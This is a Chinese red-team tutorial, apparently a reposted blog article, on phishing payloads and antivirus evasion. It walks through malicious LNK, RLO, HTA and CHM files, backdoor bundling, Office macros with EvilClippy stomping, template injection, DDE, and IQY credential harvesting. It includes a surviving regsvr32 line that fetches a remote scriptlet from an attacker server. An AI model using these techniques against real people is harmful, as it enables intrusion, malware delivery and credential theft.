文章來源:FreeBuf企業安全
在大型企業邊界安全做的越來越好的情況下,不管是APT攻擊還是紅藍對抗演練,釣魚和水坑攻擊被越來越多地應用。
釣魚往往需要免殺技術的支撐,但本章只講述釣魚和些許免殺技術,免殺系列學習在後續講解。
一、釣魚小技巧
lnk文件是用於指向其他文件的一種文件。這些文件通常稱為快捷方式文件,通常它以快捷方式放在硬盤上,以方便使用者快速的調用。lnk釣魚主要將圖標偽裝成正常圖標,但是目標會執行shell命令。
cs演示:
得到
然後新建快捷方式,將上述語句填入
下一步,然後自己命名一下,點擊完成。
當受害者雙擊之後就會自動執行我們的惡意payload,從目標網站下載並執行。
最終被得到 shell。
也可以使用msiexec.exe,系統進程,是Windows Installer的一部分,利用此進程來加載我們shellcode可以達到一定的規避作用。
RLO,即Right-to-Left Override,我們可以在⽂件名中插⼊此類unicode字符,來達到⽂件名反轉的效果。
以cmd.exe來舉例,
將其重命名為cmdgpj.exe,然後在 cmd 與 g 之間右鍵,看圖操作
ok,此時已經變成了 以 jpg 結尾的了。但是雙擊運行還是 exe 格式運行的。
再利用ResourceHacker修改圖標。
找個小姐姐圖片轉換為 ico 格式。
如圖,雙擊實際上還是運行的cmd。
HTA是HTML Application的縮寫,直接將HTML保存成HTA的格式,是一個獨立的應用軟件,本身就是html應用程序,雙擊就能運行,卻比普通網頁權限大得多,它具有桌面程序的所有權限。
製作:利用 cs
attacks——>packages——>HTML application
選擇powershell 生成。
CHM(Compiled Help Manual)即「已編譯的幫助文件」。它是微軟新一代的幫助文件格式,利用HTML作源文,把幫助內容以類似數據庫的形式編譯儲存。
製作CHM需要用到一個工具 EasyCHM(http://www.etextwizard.com/)
CHM製作過程:創建一個文件夾(名字隨意),在文件夾裡面再創建兩個文件夾(名字隨意)和一個index.html文件,在兩個文件夾內部創建各創建一個index.html文件。
將下列代碼放入index.html:
打開EasyCHM工具
後點擊新建然後導入自己創建的文件夾,點擊確定後再點擊編譯,在彈出的對話框中點擊生成CHM按鈕,會你生成一個CHM文件。
點擊之後就會彈出calc.exe
當然我們也可以換成其他的,比如說 powershell payload。直接上線。
直接上操作。
flash安裝軟件+cs生成的後門來演示。
選中需要壓縮的軟件,右鍵添加到壓縮軟件,
點擊創建自解壓格式壓縮文件
點擊 高級-→ 自解壓選項
填入解壓路徑, 絕對路勁,(C:\Windows\Temp 文件夾windows電腦都有)
點擊設置--------提取後運行
點擊模式,靜默模式, 全部隱藏
點擊更新,設置
確定,出去可以文件名改的像一點。
最後點擊確定。生成自解壓文件,
圖標有點不太對勁,使用 Restorator 把flash圖標摳下來,在弄到生成的自解壓文件。
具體操作就不寫了,直接看結果。
K8免殺系統自帶捆綁器加強版V2.0.EXE
超級文件捆綁器
生成,執行之後會執行cmd.exe一樣的效果,但此時後門軟件也被執行了。
二、Office釣魚
WIN7
Office 2016
MSF
CS
宏是Office自帶的一種高級腳本特性,通過VBA代碼,可以在Office中去完成某項特定的任務,而不必再重複相同的動作,目的是讓用戶文檔中的一些任務自動化。現在Office的宏功能已經默認是禁用。
Visual Basic for Applications(VBA)是Visual Basic的一種宏語言,是微軟開發出來在其桌面應用程序中執行通用的自動化(OLE)任務的編程語言。主要能用來擴展Windows的應用程序功能,特別是Microsoft Office軟件,也可說是一種應用程式視覺化的Basic 腳本。
常用的套路使對方開啟宏,
文檔是被保護狀態,需要啟用宏才能查看;
添加一張模糊的圖片,提示需要啟用宏才能查看高清圖片;
提示要查看文檔,按給出的一系列步驟操作;
貼一張某殺毒軟件的Logo圖片,暗示文檔被安全軟件保護。
推片來源https://mp.weixin.qq.com/s/YKZ6yWWxOhn2KjTV5lDP7w
CS生成宏
打開Word文檔,點擊 「Word 選項 — 自定義功能區 — 開發者工具(勾選) — 確定」 。
編寫主體內容後,點擊 「開發工具 — Visual Basic」,雙擊 「ThisDocument」 ,將原有內容全部清空,然後將宏payload全部粘貼進去,保存並關閉該 VBA 編輯器 。
另存為的Word類型務必要選」Word 97-2003 文檔 (*.doc)」,即 doc 文件,保證低版本可以打開。之後關閉,再打開即可執行宏代碼。
默認情況下,Office已經禁用所有宏,但仍會在打開Word文檔的時候發出通知。
點擊啟用內容,CS即上線
MSF生成宏
上線不穩定。
Evil Clippy
windwos安裝:
在Visual Studio開發者命令行窗口中輸入下列命令:
運行成功,生成exe程序。
沒做任何處理之前,VT查殺 39/61
從GUI隱藏/取消隱藏宏VT查殺 37/60
在VBA GUI編輯器中隱藏所有宏模塊(默認的「 ThisDocument」模塊除外)。這是通過從項目流[MS-OVBA 2.3.1]中刪除模塊行來實現的。
撤消由hide選項(-g)完成的更改,以便我們可以在VBA IDE中調試宏。
Stomp VBA(濫用P代碼)VT 查殺 12/60 效果很好,過火絨
將來自文本文件fakecode.vba的虛假VBA代碼放在所有模塊中,同時保持P代碼不變。這濫用了模塊流[MS-OVBA 2.3.4.3]的未記錄功能。請注意,VBA項目版本必須與主機程序匹配才能執行P代碼
參數說明:-s 參數是通過假的 vba 代碼插入到模塊中,用以混淆殺毒程序,這裡我們需要寫一個正常 無毒正常的 vba 腳本
注意:VBA重踏不適用於以Excel 97-2003工作簿(.xls)格式保存的文件
效果比較好,並且可以成功上線,
多參數混合使用:
其餘更多請看這裡https://github.com/outflanknl/EvilClippy
其他免殺方法:
http://www.h0r2yc.com/2019/08/01/office%E5%AE%8F%E6%94%BB%E5%87%BB%E5%8F%8A%E5%85%8D%E6%9D%80/
https://skewwg.github.io/2020/12/05/diao-yu-yu-she-gong-xi-lie-zhi-office-hong/
利用Word文檔加載附加模板時的缺陷所發起的惡意請求,而達到的攻擊目的,所以當目標用戶點開攻擊者發送的惡意Word文檔就可以通過向遠程服務器發送惡意請求的方式,然後加載模板執行惡意模板的宏。
發送的文檔本身不帶惡意代碼,所以能過很多靜態檢測。只需要在遠程DOTM文檔中編寫宏病毒或者木馬即可。
思路:
編寫一個帶有宏代碼的DOTM文檔,上傳服務器
編寫一個能夠遠程連接的DOCX文檔
將該文檔壓縮找到並更改settings.xml.rels文件中的內容,將其中的target內容修改為服務器上DOTM文檔的URL
將DOCX解壓後的內容再以存儲模式壓縮為ZIP
修改後綴名為DOCX,打開後即可實現遠程注入宏文檔
按照上述Word宏釣魚方法製作,保存時保存類型為 dotm , fish.dotm,
開啟Web服務,放在其目錄下,
製作 docx
直接下載份簡歷
將下載的簡歷文件後綴 docx 改為 zip,解壓.
將 target 內容改為[http://192.168.2.148:8000/hello.doc](http://192.168.2.148:8000/hello.doc),之後
全選目錄所有文件,郵件壓縮問 yanmie.zip。
之後再把zip 後綴改為 docx即可。
靶機打開,啟用宏,可上線。
適用於:
Microsoft Office Word 的一個執行任意代碼的方法,可以在不啟用宏的情況下執行任意程序。
這個功能的本意是為了更方便地在 word 里同步更新其它應用的內容,比如說在一個 word 文檔里引用了另一個 excel 表格里的某項內容,通過連接域 (Field) 的方式可以實現在 excel 里更新內容後 word 中同步更新的效果,問題出在這個域的內容可以是一個公式 (或者說表達式),這個公式並不限制內容。
GitHub:
使用:
生成 test.doc 文檔,靶機打開。成功彈出加算器
msf 復現。
項目
有點不穩,老是上線不了
配合 HTA上線
靶機打開test2.doc直接上線
改變題注,更加逼真
雙擊,選擇確定,即可上線。
創建一個文檔 dde.docx ,之後雙擊打開 dde.docx,直接Ctrl + f9快捷鍵便可以快速幫助創建一個域,我們則只需要在花括號中添加如下指令(彈出一個計算器),實戰過程中可以遠程加載我們的木馬。
成功彈出計算器。
這裡用ps遠程下載馬。
輸入

點擊是-→ 是-→確認 後即上線。
利用nishang下的Out-WebQuery.ps1, 腳本生成包含惡意 payload url 的 iqy 文件。
可以將IYQ簡單的理解成內置在excel中的一種特殊『web瀏覽器』(不能加載腳本),通過IQY【即web查詢】語句,可以直接將各類web上的列表數據輕鬆引入到當前的excel中,而正是因為這樣,從而給了我們利用excel製作釣魚郵件的機會,假如你要引入的web數據是入侵者事先準備好的一段payload iqy惡意代碼,那結果就不言而喻了。
利用過程:
新建一個excel文件,找到」數據」→」自網站」→」地址」,填寫要抓取數據的網站url,選中想抓取數據的表單
點擊導入
點擊確定,即可成功導入
接下來利用IYQ打開計算機來看看效果
在我們自己的服務器的網站目錄下放一個payload.html文件,內容是IYQ代碼
接下來就是按照之前的方法,來拉取我們自己服務器上的payload文件
導入
點擊是,即可彈出計算器
將文件保存,放在靶機打開
點擊啟用內容,繼續點擊是,即可彈出計算器。
其他方式
接下來進行彈shell操作
用到的工具:
先在kali準備好payload:
用nishang中提供好的Out-WebQuery腳本來生成iqy文件
iqy文件本身的內容很簡單,只有一個包含惡意payload的url:http://192.168.2.148/msf.html,關鍵也就在這個 html,我們需要把 html 的內容換成加載我們上面準備好的 meterpreter payload 的 iqy 語句 :regsv*/s /n /u /i:http://192.168.2.148:8080/ZTPzcY6J5.sctscrobj.dll
然後利用nishang-master\Client\Out-WebQuery.ps1,生成文件
命令成功執行後,會生成一個iqy文件
接下來,打開Web服務目錄,創建msf.html,內容為剛剛msf生成的paylaod
接下來就可以想辦法把之前生成的iqy文件發送給受害者。
當受害者雙擊打開時,默認會用Excel打開,彈出警告,點擊啟用
因為前面的iqy文件是用cmd執行的,所以會繼續詢問是否啟動另一個應用程序,CMD.EXE.
點擊是,正常情況下監聽的msf會生成一個會話。
藉助IQY竊取目標用戶密碼
之後把上一步生成的 IQY文件發給靶機,打開
此認證窗口會連續出現三次,相信三次裡面總有一個能用的賬號密碼,因為目標可能也壓根搞不清楚這是什麼東西,以為是系統的賬號密碼,就隨便輸,其實我們主要還是想利用這種方式釣到可用的 owa 或者 v*n 賬號密碼
新型PPT釣魚攻擊分析
首先,創建一個普通的PPTX文件,隨便填入一些內容,如下圖:
這裡要選擇空白的那個,選擇以後,在頁面中拉出一個觸發位置,之後會彈出動作設置的界面,選擇鼠標懸停-→ 運行程序
msiexec.exe,系統進程,是Windows Installer的一部分,利用此進程來加載我們shellcode可以達到一定的規避作用。
在PDF、Office文檔中內嵌一個跳轉鏈接是很早期的釣魚方式,通過文字信息的引導,讓受害者點開頁面,如果缺乏戒心,就可能會獲取到受害者的賬號、密碼、銀行卡、身份證等信息。
三、郵件釣魚
郵件服務器相關環境搭建,郵件信息收集請見
https://www.freebuf.com/articles/web/260391.html
涵蓋偽造(SRC假漏洞、簡歷、宏文檔、合作利誘、技術交流、釣魚網站、第三方平台)、偽造發件人、office 宏釣魚、exe引誘。 四、flash釣魚
選擇域名:http://www.f1ash.cn/
源碼:https://github.com/r00tSe7en/Fake-flash.cn
自解壓或者捆綁 配合 xss .
詳細步驟見 1.6 .
五、網站釣魚
製作釣魚網站,克隆網站
cs,msf都有這個功能
setoolkit
侵權請私聊公眾號刪文
熱文推薦
藍隊應急響應姿勢之Linux
通過DNSLOG回顯驗證漏洞
記一次服務器被種挖礦溯源
內網滲透初探 | 小白簡單學習內網滲透
實戰|通過惡意 pdf 執行 xss 漏洞
免殺技術有一套(免殺方法大集結)(Anti-AntiVirus)
內網滲透之內網信息查看常用命令
關於漏洞的基礎知識
任意賬號密碼重置的6種方法
乾貨 | 橫向移動與域控權限維持方法總匯
手把手教你Linux提權
歡迎關注LemonSec
覺得不錯點個「贊」、「在看」哦